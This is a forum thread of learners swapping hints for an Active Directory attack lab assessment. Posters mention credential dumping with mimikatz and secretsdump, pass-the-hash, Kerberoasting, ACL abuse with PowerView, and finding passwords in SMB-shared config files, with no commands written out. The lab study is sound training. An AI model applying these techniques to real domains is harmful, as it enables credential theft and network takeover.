AD Enumeration & Attacks - Skills Assessment Part II 2

Can someone help me with the last flag? I’m a domain admin but I cannot perform the kerberoasting, maybe I’m on the wrong route idk

I think you need to dump some secrets for that some one you’re interested with, why don’t you try impacket with their just-dc-user ?

any one got last 2 flags ??

how you got last 2 flags please ?

I’m at the last two questions and am hard-stuck. I can see the privilege attached to the C**** user but can’t get PowerView working to pull off the attack.


For anyone else who has this issue, download this version of PowerView and you should be right.

In Q8 you may have run mimikatz and tried to crack the hash, but what else can we do with the hash? Look at the Pth module. If you get a NTLM of admin you may want to try it on MS01 IP.


There is a way to RDP into DC.

Hello everyone. I’m stuck in the last 2 questions of AD Skill_2: Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

I have the credentials of the user with GenericAll user and I try to ACL abuse but PowerView module doesn’t work… I try the module in MS01, SQL01 and my kali using proxychains but all times the same erro.

Can anyone to help me?

Hi, how did you transfer PowerView? Perhaps the tool was damaged during the transfer.
Anyway, you are heading in the right direction.

For anyone stuck on the last two questions: after finding the user C… you can enumerate ACL on MS01. Look at the ACL enumeration/abuse module to see some examples. Look also in bloodhound to check what you need to abuse to login on DC01. Once you have done you can log in to DC01 and get the last flag. The NTLM hash for the KRBTGT account is a piece of cake :wink:

Hello all!
I’ve been stuck on "Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host. " for a few days now and was wondering if anyone had a clue that could nudge me in the right direction. I have a feeling it’s got to do with forcing a user to change their password but all the enumeration I’ve doing regarding that has been unsuccessful.


A few minutes ago I was in the same position as you. I tried everything, but nothing worked.

  • Check well the credentials you get from SQL01 (one went unnoticed by me)
  • List the new target (MS01), when you have it check in which services you can use those credentials… if by RDP, SMB or… W**M
  • Something you already tested in SQL01… /priv
  • Think simple, you have what you need for the change!

Best of luck!

Been working on Q8 of the AD Enumeration & Attacks - Skills Assessment Part II for the last few days. I got system on SQL01 and got the local admin hash so I can WINRM into SQL01 now. Used LaZagne, mimikatz, secretsdump, and manual search for things. I also have the creds of ms******. I have 2 users (AB*** and BR***) that can RDP into MS01 but am having a difficult time trying to get to admin on that box. Any hints would be appreciated or a DM. I’ve been doing these skills assessments for what feels like weeks now. Been reading and trying things above and not having success

Can anyone help me with the last 2 questions pls?

Q7: How you guys were able to login to SQL01 host with the D@********** password?
Help appreciated…

True username is in web.config (smb)
Password is in web.config (smb)
Don’t use -windows-auth

1 Like

how exactly do i need to do this ? i tried it but the tools could not be run

I’m really spent here!!

Can’t get nor the password nor the password hash for INLANEFREIGHT.LOCAL\administrator.

I’ve ran mimikatz, LaZagne and the mimikatz module in msfconsole.

Been able to grab the password hash and the cleartext for mssqlsvc, but nothing of administrator, just the SQL01$ local account.

Can anyone give me a hint? “Enumeration is an iterative process” seems such a vague hint and nothing i do gives me something solid.

Found a medium page from someone that gave a walkthrough of the assessment, but in his assessment he ran mimikatz with different results.


After gaining WinRM session with another user, got a meterpreter shell running, elevated it, ran kiwi and extracted the necessary hash!

1 Like

Stuck at Q6 any hints?

As you need to find a file with a connection string I would suggest to look to the SMB shares and search manually or by using a tool. The second option will be faster. There are tools to search into SMB shares (e.g. crackmapexec has various modules).

Hi, I’m in the 8th question of the second skill assessment in Active Directory Enumeration & Attacks .
the question is :
Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
apparently i have to pass the hash and i feel confident that i have tried more than 7 or 8 pass the hash techniques but none of them worked . i already have the hash of the Administrator account but it just does not work . any help would be appreciated